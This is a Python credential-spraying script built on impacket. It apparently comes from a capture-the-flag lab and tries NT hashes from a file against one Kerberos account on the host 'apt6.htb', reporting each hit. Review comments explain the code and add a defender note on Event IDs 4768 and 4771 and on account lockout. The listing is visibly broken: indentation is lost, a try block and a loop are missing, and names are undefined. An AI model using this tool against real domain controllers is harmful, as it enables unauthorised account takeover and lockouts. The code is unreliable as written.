from __future__ import division
from __future__ import print_function
from impacket.smbconnection import SMBConnection
from impacket import smbconnection
from binascii import unhexlify
from impacket.krb5.kerberosv5 import getKerberosTGT, KerberosError
from impacket.krb5 import constants
from impacket.krb5.types import Principal
# Resolve `hostname` with socket.getaddrinfo, first for AF_INET6 and then for
# AF_INET, unpacking each result into (af, socktype, proto, canonname, sa).
# NOTE(review): this listing has lost its indentation and looks truncated. No
# return statement is visible and `socket` is not among the imports shown, so
# what the caller actually receives cannot be confirmed from here.
# NOTE(review): getaddrinfo raises socket.gaierror when the name has no address
# in the requested family; nothing visible in this function handles that.
def gethost_addrinfo(hostname):
# IPv6 pass: the loop only rebinds the locals, so the last result wins.
for res in socket.getaddrinfo(hostname, None, socket.AF_INET6,
socket.SOCK_DGRAM, socket.IPPROTO_IP, socket.AI_CANONNAME):
af, socktype, proto, canonname, sa = res
# IPv4 pass: runs second, so any IPv4 result overwrites the IPv6 one in `sa`.
for res in socket.getaddrinfo(hostname, None, socket.AF_INET,
socket.SOCK_DGRAM, socket.IPPROTO_IP, socket.AI_CANONNAME):
af, socktype, proto, canonname, sa = res
# Make one Kerberos TGT request (AS-REQ) for `username` in `domain` against the
# KDC named by `dc_ip`, and print a line describing the outcome.
# The credential material is handed to impacket's getKerberosTGT: a cleartext
# password, hex-encoded LM/NT hashes (decoded with unhexlify) and an AES key.
# NOTE(review): the `try:` that the two `except` clauses belong to, and the
# body of the KDC_ERR_PREAUTH_FAILED branch, are missing from this listing, so
# the return value and the extent of the guarded region cannot be confirmed.
# Defender view: every call is one AS-REQ at the domain controller. On a
# Windows DC these are logged as Event ID 4768 (TGT requested, success or
# failure) and 4771 (pre-authentication failed). A burst of such events for
# one account from one source address is the pattern worth alerting on.
def _login(username, password, domain, lmhash, nthash, aesKey, dc_ip):
# The `dc_ip` argument is replaced by whatever gethost_addrinfo returns for it.
dc_ip = gethost_addrinfo(dc_ip)
# NT_PRINCIPAL is the name type for an ordinary user principal.
kerb_principal = Principal(username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
# Hashes arrive as hex strings; unhexlify('') yields b'', so an empty hash is
# passed on as empty bytes.
getKerberosTGT(kerb_principal, password, domain,
unhexlify(lmhash), unhexlify(nthash), aesKey, dc_ip)
# Reached only when the KDC issued a TGT, i.e. the credential was accepted.
print('[+] Success %s/%s' % (domain, username) )
except KerberosError as e:
# Three distinct KDC errors are reported with the same "username" message.
# NOTE(review): KDC_ERR_CLIENT_REVOKED is what a KDC returns for a disabled,
# expired or locked-out account, so "Could not find username" is misleading
# for that code; it can mean repeated failures have locked the account.
if (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_C_PRINCIPAL_UNKNOWN.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_CLIENT_REVOKED.value) or (e.getErrorCode() == constants.ErrorCodes.KDC_ERR_WRONG_REALM.value):
print("[-]Could not find username: %s/%s" % (domain, username) )
# The account exists but the credential was rejected; the handling for this
# branch is not present in the listing.
elif e.getErrorCode() == constants.ErrorCodes.KDC_ERR_PREAUTH_FAILED.value:
# Transport-level failure reaching the KDC (socket.error is OSError on Python 3).
except socket.error as e:
print('[-]Could not connect to DC')
# Account name the script is written around; hard-coded rather than taken from
# the command line.
# NOTE(review): `DOMAIN`, which login() reads, is not defined anywhere in the
# visible lines. It is presumably set next to this constant; confirm.
USERNAME = 'henry.vinson'
# Convenience wrapper around _login: tries `hash` as the NT hash for `username`
# in DOMAIN, with an empty password, an empty LM hash and no AES key, against
# the hard-coded host "apt6.htb".
# NOTE(review): the parameter name `hash` shadows the builtin of the same name.
# NOTE(review): `hash` goes straight to unhexlify inside _login, so a value
# that is not valid hex raises binascii.Error there; nothing visible catches it.
def login(username, hash):
return _login(username, '', DOMAIN, '', hash, None, "apt6.htb")
# Load the candidate list from hashes.txt, one entry per line, stripped of
# surrounding whitespace.
# NOTE(review): despite the name `passwords`, the file name and login()'s
# `hash` parameter suggest these are NT hashes; confirm against the caller.
# NOTE(review): the file object is never closed; a `with open(...)` block
# would release it deterministically.
passwords = [x.strip() for x in open("hashes.txt").readlines()]
# NOTE(review): `x` is scoped to the comprehension above on Python 3, so this
# line raises NameError as shown. The loop that calls login() for each entry
# and guards this print appears to be missing from the listing.
# The f-string needs Python 3.6+, which makes the `from __future__` imports at
# the top of the file redundant.
print(f"[+] Success {x}")